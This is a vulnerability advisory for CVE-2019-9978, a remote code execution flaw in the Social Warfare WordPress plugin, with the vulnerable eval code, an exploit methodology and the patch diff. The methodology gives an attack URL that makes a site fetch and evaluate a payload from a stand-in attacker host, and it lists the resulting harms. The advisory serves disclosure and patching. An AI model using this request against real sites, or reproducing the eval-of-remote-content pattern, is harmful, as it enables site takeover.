Skip to content

Social Warfare - Unauthenticated Remote Code Execution

Summary

Description Details
Name Social Warfare - Unauthenticated Remote Code Execution
Summary Vulnerability while importing settings from another site
Affected application Social Warfare Wordpress plugin
Affected revision 3.5.1, 3.5.2
Vendor update available Yes
CVE CVE-2019-9978
Ids CWE-94
CVSSv3.0 Base Score 10.0
CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L/E:P/RL:O/RC:C
Public Exploit available Yes
Exploit verified Yes
Authentication Required No

Vulnerable Code

// wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
$options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');

...

     $array = 'return ' . $options . ';';

...

try {
      $fetched_options = eval( $array );
    }

Exploit Methodology

The attacker will have to do the following to exploit this vulnerability:-

  • Find sites running vulnerable version of this plugin
  • Needs a url to render payload (say, http://ATTACKER_HOST/payload.txt)
  • Run attack http://site_name/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt
  • Attacker can upload malware and maintain access or redirect visitors to malicious sites or can deface the site

Security Patch

--- a/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
+++ b/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
@@ -218,70 +218,6 @@ class SWP_Database_Migration {
            // }


-            /**
-             * Migrates options from $_GET['swp_url'] to the current site.
-             *
-             * @since 3.4.2
-             */
-            if ( true == SWP_Utility::debug('load_options') ) {
-                  if (!is_admin()) {
-                        wp_die('You do not have authorization to view this page.');
-                  }
-
-                  $options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');
-
-                  //* Bad url.
-                  if (!$options) {
-                        wp_die('nothing found');
-                  }
-
-                  $pre = strpos($options, '<pre>');
-                  if ($pre != 0) {
-                        wp_die('No Social Warfare found.');
-                  }
-
-                  $options = str_replace('<pre>', '', $options);
-                  $cutoff = strpos($options, '</pre>');
-                  $options = substr($options, 0, $cutoff);
-
-                  $array = 'return ' . $options . ';';
-
-                  try {
-                        $fetched_options = eval( $array );
-                  }
-                  catch (ParseError $e) {
-                        $message = 'Error evaluating fetched data. <br/>';
-                        $message .= 'Message from error: ' . $e->getMessage() . '<br/>';
-                        $message .= 'Fetched data: <br/>';
-                        $message .= var_export($fetched_options, 1);
-                        wp_die($message);
-                  }
-
-                  if (is_array( $fetched_options) ) {
-                        foreach( $fetched_options as $key => $value) {
-                              if (strpos( $key, 'license' ) > 0) {
-                                    unset( $fetched_options[$key] );
-                              }
-                              if (strpos( $key, 'token' ) > 0) {
-                                    unset( $fetched_options[$key] );
-                              }
-                              if (strpos( $key, 'login' ) > 0) {
-                                    unset( $fetched_options[$key] );
-                              }
-                        }
-                        //* Preserve filtered data, such as license keys.
-                        $new_options = array_merge( get_option('social_warfare_settings'), $fetched_options );
-
-                        if (update_option( 'social_warfare_settings', $new_options )) {
-                              wp_die('Social Warfare settings updated to match ' . $_GET['swp_url']);
-                        }
-                        else {
-                              wp_die('Tried to update settings to match ' . $_GET['swp_url'] . ', but something went wrong or no options changed.');
-                        }
-                  }
-
-                  wp_die('No changes made.');
-            }

            if ( true === SWP_Utility::debug('get_filtered_options') ) :
                  global $swp_user_options;
@@ -292,9 +228,7 @@ class SWP_Database_Migration {
            endif;

            if ( true == SWP_Utility::debug('get_post_meta') ) :
-
                  add_action( 'template_redirect', array( $this, 'print_post_meta' ) );
-
            endif;

            /**

References

MISC:https://twitter.com/warfareplugins/status/1108852747099652099 MISC:https://wordpress.org/plugins/social-warfare/#developers MISC:https://wpvulndb.com/vulnerabilities/9238